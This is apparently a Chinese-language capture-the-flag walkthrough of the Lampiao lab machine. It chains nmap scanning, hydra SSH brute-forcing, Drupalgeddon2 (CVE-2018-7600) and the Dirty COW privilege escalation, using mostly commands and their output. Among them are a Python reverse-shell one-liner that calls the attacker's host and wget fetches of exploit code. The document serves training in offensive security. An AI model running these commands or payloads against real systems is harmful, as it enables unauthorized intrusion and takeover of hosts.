【原创】项目二Lampiao
实战流程
1,nmap扫描C段
┌──(root㉿heiyu)-[/home/whoami]
└─# nmap -sP 192.168.186.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-24 03:34 EDT
Nmap scan report for 192.168.186.139 (192.168.186.139)
Host is up (0.00031s latency).
2,找到靶机,进行进一步扫描,发现目标计算机上有三个可用的开放端口22、80、1898端口
┌──(root㉿heiyu)-[/home/whoami]
└─# nmap -p- 192.168.186.139
3,信息枚举:http://10.211.55.9:1898/ -> Read more 发现改页面信息:
http://10.211.55.9:1898/?q=node/2
页面发现:
audio.m4a:语音获得用户名:tiago
qrc.png:图片二维码扫描获得信息,需要爆破
4,爆破网站目录
┌──(root㉿heiyu)-[/home/whoami]
└─# dirb http://192.168.186.139:1898
获得url:http://10.211.55.9:1898/robots.txt
继续枚举获得:http://10.211.55.9:1898/CHANGELOG.txt
发现是:Drupal 7.54, 2017-02-01
4、获取密码字典:cewl:通过爬行网站获取关键信息创建一个密码字典
cewl http://192.168.186.139:1898/?q=node/1 -w heiyu.txt
5、hydra爆破
hydra -l tiago -P heiyu.txt 192.168.186.139 ssh
先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:
[22][ssh] host: 10.211.55.9 login: tiago password: Virgulino
用户: tiago
密码: Virgulino
6、登录ssh
ssh tiago@192.168.186.139
发现是低权限用户!需要提权!
版本信息如下
7、提权
https://github.com/mzet-/linux-exploit-suggester
下载提权文件
proxychains wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
开启web服务
在目标服务器上下载les.sh文静
wget http://192.168.186.130:8081/les.sh
追加执行权限
chmod +x les.sh
执行文件后会列出可以用于该linux服务器上提权的方法
./les.sh
使用其中的脏牛提权
搜索kali自带的exploit
谷歌搜索40847的具体用法
https://www.exploit-db.com/exploits/40847
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s
把40847.cpp文件复制到poc中(因为这个文件夹开了网络服务)
┌──(root㉿heiyu)-[/home/whoami]
└─# cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/whoami/poc
目标机器下载40847.cpp
wget http://192.168.186.130:8081/40847.cpp
执行cpp文件,生成可执行文件heiyu
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o heiyu 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
执行heiyu
./heiyu
获得root的密码
Root password is: dirtyCowFun
重新链接ssh
┌──(root㉿heiyu)-[/home/whoami/poc]
└─# ssh root@192.168.186.139
root登录成功
获取flag成功
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366
思路拓展1--Xray一条龙
1、通过AWVS+xray跑出了poc:poc-yaml-drupal-cve-2018-7600-rce
那么Xray是给出了两篇poc的文章:
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/
通过文章查看,Drupalgeddon2有poc都是rb运行文件,下载!
proxychains git clone https://github.com/dreadlocked/Drupalgeddon2.git
安装模块,用来排错
sudo gem install highline
安装完highline后即可执行
./drupalgeddon2.rb http://192.168.186.139:1898/
脚本很强大,通过服务器7.54版本的漏洞,直接在网站的根目录写了个shell
此时已经获取的这个shell,正向shell
由于该shell不能执行g++,并且实战中有防火墙的原因,正向shell一般不稳定,因此尝试通过反弹shell获取链接
本机开启6666端口
目标机开启反弹shell脚本
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.186.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
获取反弹shell
补齐shell弹框
python -c 'import pty; pty.spawn("/bin/bash")'
下载提权文件
wget http://192.168.186.130:8081/40847.cpp
编译提权文件
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
执行提权可执行文件
./40847
拓展思路2-Metasplit
谷歌搜索:Drupal 7.54 exploit
# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
msfconsole
使用exploit/unix/webapp/drupal_drupalgeddon2
显示条件信息
show options
set RHOSTS 192.168.186.139
set RPORT 1898
run
此时获取了了伪shell
进行shell的补齐
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'
此时获取稳定shell
提权
上传提权文件,后面跟之前的方式一样
meterpreter > upload /home/whoami/poc/les.sh /tmp/